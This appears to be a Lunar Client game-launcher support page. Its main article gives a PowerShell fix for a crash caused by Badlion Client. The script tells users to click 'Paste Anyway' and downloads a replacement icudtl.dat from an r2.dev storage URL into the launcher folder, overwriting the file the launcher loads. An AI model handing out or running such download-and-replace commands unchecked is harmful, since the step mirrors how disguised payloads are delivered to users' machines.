Some players are experiencing an issue where Lunar Client closes immediately after launching caused by launching Badlion Client, following…
Some players are experiencing an issue where Lunar Client closes immediately after launching caused by launching Badlion Client, following the most recent Launcher update. This only affects a small portion of users. To fix this issue:
1. Open Powershell
2. Execute the following command. If prompted when copying press "Paste Anyway" and hit Enter:
$dirs = @(
"$env:LOCALAPPDATA\Programs\lunarclient",
"$env:LOCALAPPDATA\Programs\Lunar Client",
"$env:LOCALAPPDATA\Programs\launcher"
)
$target = $dirs | Where-Object { Test-Path $_ } | Select-Object -First 1
if ($target) {
Invoke-WebRequest "https://pub-297c6a58c72443ab9ecc42efedc70805.r2.dev/icudtl.dat" -OutFile "$target\icudtl.dat"
Write-Host "Replaced icudtl.dat in: $target"
} else {
Write-Host "Neither Lunar Client folder was found under $env:LOCALAPPDATA\Programs"
}
This should now fix your issue and you should be able to open the Launcher again. Ensure you have updated your Lunar Client launcher before attempting to open Badlion Client.
Lunar Client logos not appearing
Lunar Client logos next to names indicate that a user is currently playing on Lunar Client.
Lunar Client using Integrated Graphics
Laptops usually come with two graphics cards: the integrated graphics used for power-efficiency and the dedicated graphics used for tasks…
No Lunar Client shortcut
Lunar Client was not able to create a shortcut on your desktop or Start Menu folder, so the launcher will not appear in Windows Search.
Can't hear sound in game
If Lunar Client's sound is not functioning, please follow the steps below.
Lunar Client launcher is infinitely refreshing on start-up
If the Lunar Client launcher opens and infinitely refreshes, it's likely due to having package.json file in your user folder.
Multiplayer Access Disabled
© 2026 Moonsworth, LLC